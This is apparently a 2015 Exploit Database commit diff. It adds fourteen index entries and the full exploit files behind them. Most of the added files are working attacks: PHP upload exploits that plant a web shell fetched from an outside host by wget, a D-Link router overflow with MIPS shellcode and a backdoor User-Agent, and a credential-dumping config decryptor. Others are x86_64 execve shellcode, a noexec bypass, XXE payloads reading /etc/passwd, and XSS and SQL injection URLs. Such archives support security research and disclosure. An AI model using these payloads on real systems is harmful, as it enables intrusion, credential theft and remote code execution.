DB: 2015-11-26

14 new exploits

files.csv

@@ -34760,6 +34760,7 @@ id,file,description,date,author,platform,type,port
 38470,platforms/hardware/webapps/38470.txt,"netis RealTek Wireless Router / ADSL Modem - Multiple Vulnerabilities",2015-10-15,"Karn Ganeshen",hardware,webapps,0
 38471,platforms/hardware/webapps/38471.txt,"PROLiNK H5004NK ADSL Wireless Modem - Multiple Vulnerabilities",2015-10-15,"Karn Ganeshen",hardware,webapps,0
 38472,platforms/windows/local/38472.py,"Blat.exe 2.7.6 SMTP / NNTP Mailer - Buffer Overflow",2015-10-15,hyp3rlinx,windows,local,0
+38473,platforms/linux/local/38473.py,"Linux >= 3.17 noexec Bypass with Python ctypes and memfd_create",2015-10-15,soyer,linux,local,0
 38474,platforms/windows/local/38474.txt,"Windows 10 Sandboxed Mount Reparse Point Creation Mitigation Bypass (MS15-111)",2015-10-15,"Google Security Research",windows,local,0
 38478,platforms/php/webapps/38478.txt,"Sosci Survey Multiple Security Vulnerabilities",2013-04-17,"T. Lazauninkas",php,webapps,0
 38479,platforms/asp/webapps/38479.txt,"Matrix42 Service Store 'default.aspx' Cross Site Scripting Vulnerability",2013-03-06,43zsec,asp,webapps,0
@@ -35050,6 +35051,7 @@ id,file,description,date,author,platform,type,port
 38775,platforms/linux/local/38775.rb,"Chkrootkit Local Privilege Escalation",2015-11-20,metasploit,linux,local,0
 38776,platforms/cgi/webapps/38776.txt,"Cambium ePMP 1000 - Multiple Vulnerabilities",2015-11-20,"Karn Ganeshen",cgi,webapps,0
 38777,platforms/php/webapps/38777.txt,"Joomla! JVideoClip Component 'uid' Parameter SQL Injection Vulnerability",2013-09-21,SixP4ck3r,php,webapps,0
+38778,platforms/linux/dos/38778.txt,"Blue Coat ProxySG 5.x and Security Gateway OS Denial Of Service Vulnerability",2013-09-23,anonymous,linux,dos,0
 38779,platforms/multiple/dos/38779.py,"Abuse HTTP Server Remote Denial of Service Vulnerability",2013-09-30,"Zico Ekel",multiple,dos,0
 38780,platforms/php/webapps/38780.txt,"SilverStripe Multiple HTML Injection Vulnerabilities",2013-09-23,"Benjamin Kunz Mejri",php,webapps,0
 38783,platforms/php/webapps/38783.php,"WordPress Woopra Analytics Plugin 'ofc_upload_image.php' Arbitrary PHP Code Execution Vulnerability",2013-10-07,wantexz,php,webapps,0
@@ -35072,3 +35074,15 @@ id,file,description,date,author,platform,type,port
 38800,platforms/php/webapps/38800.txt,"FreeSMS pages/crc_handler.php scheduleid Parameter SQL Injection",2013-09-27,"Sarahma Security",php,webapps,0
 38801,platforms/php/webapps/38801.txt,"FreeSMS pages/crc_handler.php Multiple Parameter XSS",2013-09-27,"Sarahma Security",php,webapps,0
 38802,platforms/multiple/remote/38802.txt,"Oracle Glassfish Server 2.1.1/3.0.1 Multiple Subcomponent Resource Identifier Traversal Arbitrary File Access",2013-10-15,"Alex Kouzemtchenko",multiple,remote,0
+38804,platforms/hardware/remote/38804.py,"Multiple Level One Enterprise Access Point Devices 'backupCfg.cgi' Security Bypass Vulnerability",2013-10-15,"Richard Weinberger",hardware,remote,0
+38805,platforms/multiple/remote/38805.txt,"SAP Sybase Adaptive Server Enterprise XML External Entity Information Disclosure Vulnerability",2015-11-25,"Igor Bulatenko",multiple,remote,0
+38806,platforms/cgi/webapps/38806.txt,"Bugzilla 'editflagtypes.cgi' Multiple Cross Site Scripting Vulnerabilities",2013-10-09,"Mateusz Goik",cgi,webapps,0
+38807,platforms/cgi/webapps/38807.txt,"Bugzilla <= 4.2 Tabular Reports Unspecified XSS",2013-10-09,"Mateusz Goik",cgi,webapps,0
+38808,platforms/php/webapps/38808.txt,"WordPress WP-Realty Plugin 'listing_id' Parameter SQL Injection Vulnerability",2013-10-08,Napsterakos,php,webapps,0
+38809,platforms/php/remote/38809.php,"PHP Point Of Sale 'ofc_upload_image.php' Remote Code Execution Vulnerability",2013-10-18,Gabby,php,remote,0
+38810,platforms/hardware/remote/38810.py,"Multiple Vendors 'RuntimeDiagnosticPing()' Stack Buffer Overflow Vulnerability",2013-10-14,"Craig Heffner",hardware,remote,0
+38811,platforms/php/webapps/38811.txt,"WordPress Daily Deal Theme Arbitrary Shell Upload Vulnerability",2013-10-23,DevilScreaM,php,webapps,0
+38812,platforms/multiple/remote/38812.txt,"DELL Quest One Password Manager CAPTCHA Security Bypass Vulnerability",2011-10-21,"Johnny Bravo",multiple,remote,0
+38813,platforms/multiple/remote/38813.txt,"Apache Shindig XML External Entity Information Disclosure Vulnerability",2013-10-21,"Kousuke Ebihara",multiple,remote,0
+38814,platforms/php/webapps/38814.php,"Joomla! Maian15 Component 'name' Parameter Arbitrary Shell Upload Vulnerability",2013-10-20,SultanHaikal,php,webapps,0
+38815,platforms/lin_x86-64/shellcode/38815.c,"Linux x86_64 Polymorphic execve Shellcode - 31 bytes",2015-11-25,d4sh&r,lin_x86-64,shellcode,0

platforms/cgi/webapps/38806.txt

@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/63204/info
+
+Bugzilla is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+Bugzilla versions 2.17.1 through 4.0.10, 4.1.1 through 4.2.6 and 4.3.1 through 4.4 are vulnerable. 
+
+http://www.example.com/bugzilla/editflagtypes.cgi?action=insert&can_fully_edit=1&id="><script>alert(1)</script>&token=&target_type=bug&check_clusions=1&name=test1&description=test2&product=TestProduct&component=TestComponent&categoryAction-include=Include&sortkey=1&is_active=on&is_requestable=on&cc_list=&is_requesteeble=on&is_multiplicable=on&grant_group=&request_group=
+
+http://www.example.com/bugzilla/editflagtypes.cgi?action=insert&can_fully_edit=1&id=&token=&target_type=bug&check_clusions=1&name=test&description=test2&product=TestProduct&component=TestComponent&categoryAction-include=Include&sortkey=1"><script>alert(2)</script>&is_active=on&is_requestable=on&cc_list=&is_requesteeble=on&is_multiplicable=on&grant_group=&request_group= 

platforms/cgi/webapps/38807.txt

@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/63205/info
+
+Bugzilla is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input.
+
+Attackers can exploit this issue to steal cookie-based authentication information, execute arbitrary client-side scripts in the context of the browser, and obtain sensitive information. Other attacks are also possible.
+
+Bugzilla versions 4.1.1 through 4.2.6, and 4.3.1 through 4.4 are vulnerable.
+
+Note: This issue exists due to an incomplete fix for CVE-2012-4189 (identified in BID 56504 - Bugzilla Multiple Cross Site Scripting and Information Disclosure Vulnerabilities). 
+
+https://www.example.com/bugzilla-tip/report.cgi?x_axis_field=short_desc&y_axis_field=short_desc&z_axis_field=short_desc&no_redirect=1&query_format=report-table&short_desc_type=allwordssubstr&short_desc=&resolution=---&longdesc_type=allwordssubstr&longdesc=&bug_file_loc_type=allwordssubstr&bug_file_loc=&status_whiteboard_type=allwordssubstr&status_whiteboard=&keywords_type=allwords&keywords=&deadlinefrom=&deadlineto=&bug_id=22386%2C22387&bug_id_type=anyexact&emailassigned_to1=1&emailtype1=substring&email1=&emailassigned_to2=1&emailreporter2=1&emailqa_contact2=1&emailcc2=1&emailtype2=substring&email2=&emaillongdesc3=1&emailtype3=substring&email3=&chfieldvalue=&chfieldfrom=&chfieldto=Now&j_top=AND&f1=noop&o1=noop&v1=&format=table&action=wrap 

platforms/hardware/remote/38804.py

@@ -0,0 +1,54 @@
+source: http://www.securityfocus.com/bid/63168/info
+
+Multiple Level One Enterprise Access Point devices are prone to a security bypass vulnerability.
+
+Successfully exploiting this issue may allow an attacker to gain access to sensitive configuration information including credentials. This may aid in further attacks.
+
+Level One EAP-110 and EAP-200 running firmware 2.00.03 build 1.50-1.5045 are vulnerable; other versions may also be affected. 
+
+# tellpassword.py
+#
+# Extracts user accounts from Level1 (ip4net)
+# EAP-200 (and other) Wifi Access Points
+#
+# (c) 2013 sigma star gmbh
+
+import sys, re
+
+attribRegex = re.compile(r"(\w+)=\"([^\"]*)\"")
+
+if (len(sys.argv) != 2):
+    print "USAGE: %s config-backup.conf" % sys.argv[0]
+    exit(1)
+
+# decrypt config
+encrypted = open(sys.argv[1], 'rb')
+plain = open('plain.xml', 'w')
+cntr = 0
+encrypted.seek(128)
+byte = encrypted.read(1)
+print "Decrypting config file into plain.xml"
+while byte:
+    plainOrd = ((ord(byte) ^ 0xff) + cntr) % 0x80
+    plain.write(chr(plainOrd))
+    cntr = (cntr + 1) % 0x40
+    byte = encrypted.read(1)
+encrypted.close()
+plain.close()
+
+# find user accounts
+print "Parsing accounts..."
+plain = open('plain.xml', 'r')
+for line in plain:
+    if "<user" in line:
+        user = None
+        password = None
+        for match in attribRegex.finditer(line):
+            attrib = match.group(1)
+            if attrib == "name":
+                user = match.group(2)
+            elif attrib == "password":
+                password = match.group(2)
+        if len(password) > 0:
+                print " - %s: %s" % (user, password)
+plain.close()

platforms/hardware/remote/38810.py

@@ -0,0 +1,66 @@
+source: http://www.securityfocus.com/bid/63234/info
+
+Multiple Vendors are prone to a stack-based buffer-overflow vulnerability.
+
+Exploiting this vulnerability may allow attackers to execute arbitrary code in the context of the affected devices.
+
+The following are vulnerable:
+
+D-Link DIR-120
+D-Link DI-624S
+D-Link DI-524UP
+D-Link DI-604S
+D-Link DI-604UP
+D-Link DI-604
+D-Link DIR-100
+D-Link TM-G5240
+PLANEX COMMUNICATIONS BRL-04UR
+PLANEX COMMUNICATIONS BRL-04R
+PLANEX COMMUNICATIONS BRL-04CW 
+
+import sys
+import urllib2
+
+try:
+	url = 'http://%s/Tools/tools_misc.xgi?domain=a&set/runtime/diagnostic/pingIp=' % sys.argv[1]
+except Exception, e:
+	print str(e)
+	print 'Usage: %s <target ip>' % sys.argv[0]
+	sys.exit(1)
+
+# This is the actual payload; here it is a simple reboot shellcode.
+# This payload size is limited to about 200 bytes, otherwise you'll crash elsewhere in /bin/webs.
+payload  = "\x3c\x06\x43\x21" # lui     a2,0x4321
+payload += "\x34\xc6\xfe\xdc" # ori     a2,a2,0xfedc
+payload += "\x3c\x05\x28\x12" # lui     a1,0x2812
+payload += "\x34\xa5\x19\x69" # ori     a1,a1,0x1969
+payload += "\x3c\x04\xfe\xe1" # lui     a0,0xfee1
+payload += "\x34\x84\xde\xad" # ori     a0,a0,0xdead
+payload += "\x24\x02\x0f\xf8" # li      v0,4088
+payload += "\x01\x01\x01\x0c" # syscall 0x40404
+
+# The payload is split up; some of it before the return address on the stack, some after.
+# This little snippet skips over the return address during execution.
+# It assumes that your shellcode will not be using the $fp or $t9 registers.
+move_sp_fp = "\x03\xa0\xf0\x21" # move $fp, $sp
+jump_code =  "\x27\xd9\x02\xd4" # addiu $t9, $fp, 724
+jump_code += "\x03\x21\xf8\x08" # jr $t9
+jump_code += "\x27\xE0\xFE\xFE" # addiu $zero, $ra, -0x102
+
+# Stitch together the payload chunk(s) and jump_code snippet
+shellcode_p1 = move_sp_fp + payload[0:68] + jump_code + "DD"
+if len(shellcode_p1) < 86:
+	shellcode_p1 += "D" * (86 - len(shellcode_p1))
+	shellcode_p2 = ""
+else:
+	shellcode_p2 = "DD" + payload[68:]
+
+# Build the overflow buffer, with the return address and shellcode
+# libc.so base address and ROP gadget offset for the DIR-100, revA, v1.13
+# libc_base = 0x2aaee000
+# ret_offset = 0x3243C
+buf = shellcode_p1 + "\x2A\xB2\x04\x3C" + shellcode_p2
+
+# Normally only admins can access the tools_misc.xgi page; use the backdoor user-agent to bypass authentication
+req = urllib2.Request(url+buf, headers={'User-Agent' : 'xmlset_roodkcableoj28840ybtide'})
+urllib2.urlopen(req)

platforms/lin_x86-64/shellcode/38815.c

@@ -0,0 +1,40 @@
+/*
+;Title: polymorphic execve shellcode
+;Author: d4sh&r
+;Contact: https://mx.linkedin.com/in/d4v1dvc
+;Category: Shellcode
+;Architecture:linux x86_64
+;SLAE64-1379
+;Description:
+;Polymorphic shellcode in 31 bytes to get a shell 
+;Tested on : Linux kali64 3.18.0-kali3-amd64 #1 SMP Debian 3.18.6-1~kali2 x86_64 GNU/Linux
+
+;Compilation and execution
+;nasm -felf64 shell.nasm -o shell.o
+;ld shell.o -o shell
+;./shell
+
+global _start
+ 
+_start:
+    mul esi
+    push rdx
+    mov al,1                         
+    mov rbx, 0xd2c45ed0e65e5edc ;/bin//sh 
+    rol rbx,24
+    shr rbx,1
+    push rbx
+    lea rdi, [rsp] ;address of /bin//sh
+    add al,58
+    syscall
+
+*/
+#include<stdio.h>
+//gcc -fno-stack-protector -z execstack shellcode.c -o shellcode
+unsigned char code[] = "\xf7\xe6\x52\xb0\x01\x48\xbb\xdc\x5e\x5e\xe6\xd0\x5e\xc4\xd2\x48\xc1\xc3\x18\x48\xd1\xeb\x53\x48\x8d\x3c\x24\x04\x3a\x0f\x05";
+ 
+main()
+{
+   int (*ret)()=(int(*)()) code;
+    ret();
+}

platforms/linux/dos/38778.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/62647/info
+
+Blue Coat ProxySG and Security Gateway OS are prone to a denial-of-service vulnerability.
+
+Successful exploits may allow an attacker to consume excessive resources, denying service to legitimate users. 
+
+https://raw.githubusercontent.com/offensive-security/exploit-database-bin-sploits/master/sploits/thc-ssl-dos-1.4.tar.gz

platforms/linux/local/38473.py

@@ -0,0 +1,24 @@
+# Exploit Title: Linux >= 3.17 noexec bypass with python ctypes and memfd_create
+# Date: 2015.10.14
+# Exploit Author: soyer
+# Version: linux >= 3.17
+# Tested on: Ubuntu 15.04 (x86_64)
+#
+# usage:
+#
+#   $ ls -la exec_file
+#   -rwxr-xr-x 1 soyer soyer 8600 Oct 14 15:04 exec_file
+#   $ ./exec_file
+#   bash: ./exec_file: Permission denied
+#   $ mount |grep $(pwd)
+#   tmpfs on /run/lock type tmpfs (rw,nosuid,nodev,noexec,relatime,size=5120k)
+#   $ python noexec.py < exec_file
+#   Hello world! fprintf=0x400470, stdout=0x7f63a3933740
+
+from ctypes import *
+c = CDLL("libc.so.6")
+fd = c.syscall(319,"tempmem",0)
+c.sendfile(fd,0,0,0x7ffff000)
+c.fexecve(fd,byref(c_char_p()),byref(c_char_p()))
+print "fexecve failed"
+

platforms/multiple/remote/38805.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/63193/info
+
+SAP Sybase Adaptive Server Enterprise is prone to an information-disclosure vulnerability.
+
+An attacker can exploit this issue to gain access to sensitive information; this may lead to further attacks.
+
+SAP Sybase Adaptive Server Enterprise 15.7 ESD 2 is vulnerable; other versions may also be affected. 
+
+SELECT xmlextract('/', xmlparse('<?xml version="1.0" standalone="yes"?><!DOCTYPE content [ <!ENTITY abc SYSTEM "/etc/passwd">]><content>&abc;</content>')) 

platforms/multiple/remote/38812.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/63259/info
+
+DELL Quest One Password Manager is prone to a security bypass vulnerability.
+
+An attacker can exploit this issue to bypass certain security restrictions and gain access to sensitive areas of the application to perform unauthorized actions; this may aid in launching further attacks. 
+
+ScenarioActionId=42696720-7368-6974-2070-726F64756374&UserName=domain%5Cuser&Search=false 

platforms/multiple/remote/38813.txt

@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/63260/info
+
+Apache Shindig is prone to an information-disclosure vulnerability.
+
+An attacker can exploit this issue to gain access to sensitive information; this may lead to further attacks.
+
+Apache Shindig 2.5.0 is vulnerable. 
+
+<?xml version="1.0" encoding="UTF-8"?> 
+<!DOCTYPE Module [ <!ENTITY passwd SYSTEM "file:///etc/passwd"> ]> <Module> 
+<ModulePrefs title="Test Application"> <Require feature="opensocial-0.9" /> 
+</ModulePrefs> <Content type="html"> &passwd; hello </Content> </Module>
+

platforms/php/remote/38809.php

@@ -0,0 +1,45 @@
+source: http://www.securityfocus.com/bid/63219/info
+
+PHP Point Of Sale is prone to a remote code-execution vulnerability.
+
+An attacker can exploit this issue to execute arbitrary code in context of the application. Failed exploits may result in denial-of-service conditions. 
+
+<?php   
+$options = getopt('t:n:'); 
+if(!isset($options['t'], $options['n'])) 
+die("\n      [+] Simple Exploiter Point Of Sale by Gabby [+] \n Usage : php sale.php -t http://example.com -n bie.php\n 
+-t http://example.com   = Target mu ..
+-n bie.php             = Nama file yang mau kamu pakai...\n\n");  
+   
+$target =  $options['t']; 
+$nama   =  $options['n']; 
+$shell  = "{$target}/application/libraries/tmp-upload-images/{$nama}"; 
+$target = "{$target}/application/libraries/ofc-library/ofc_upload_image.php?name={$nama}"; 
+$data   = '<?php 
+ system("wget http://www.example.com/wso.txt; mv wso.txt bie.php");
+ fclose ( $handle ); 
+ ?>'; 
+$headers = array('User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1', 
+'Content-Type: text/plain'); 
+echo "=============================================== \n"; 
+echo ":   Simple Exploiter Point Of Sale by Gabby   :\n"; 
+echo "=============================================== \n\n"; 
+echo "[+] Upload Shell ke : {$options['t']}\n"; 
+$handle = curl_init(); 
+curl_setopt($handle, CURLOPT_URL, $target); 
+curl_setopt($handle, CURLOPT_HTTPHEADER, $headers); 
+curl_setopt($handle, CURLOPT_POSTFIELDS, $data); 
+curl_setopt($handle, CURLOPT_RETURNTRANSFER, true); 
+$source = curl_exec($handle); 
+curl_close($handle); 
+if(!strpos($source, 'Undefined variable: HTTP_RAW_POST_DATA') && @fopen($shell, 'r')) 
+{ 
+echo "[+] Exploit Sukses,.. :D\n"; 
+echo "[+] {$shell}\n"; 
+} 
+else
+{ 
+die("[-] Exploit Gagal,.. :(\n"); 
+} 
+  
+?>

platforms/php/webapps/38808.txt

@@ -0,0 +1,8 @@
+source: http://www.securityfocus.com/bid/63217/info
+
+WP-Realty plugin for WordPress is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
+
+A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. 
+
+http://www.example.com/wordpress/wp-content/plugins/wp-realty/index_ext.php?action=contact_friend&popup=yes&listing_id=[SQLi]
+http://www.example.com/wordpress/wp-content/plugins/wp-realty/index_ext.php?action=contact_friend&popup=yes&listing_id=[SQLi 

platforms/php/webapps/38811.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/63257/info
+
+The Daily Deal theme is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
+
+An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application. 
+
+http://www.example.com/wp-content/themes/DailyDeal/monetize/upload/ 

platforms/php/webapps/38814.php

@@ -0,0 +1,20 @@
+source: http://www.securityfocus.com/bid/63287/info
+
+The Maian15 component for Joomla! is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
+
+An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application. 
+
+<?php
+$headers = array("Content-Type: application/octet-stream");
+$uploadfile="<?php phpinfo(); ?>";
+$ch =
+curl_init("http://www.example.com/path/administrator/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=shell.php");
+curl_setopt($ch, CURLOPT_POST, true);
+curl_setopt($ch, CURLOPT_POSTFIELDS, @$uploadfile);
+curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
+$postResult = curl_exec($ch);
+curl_close($ch);
+print "$postResult";
+?>
+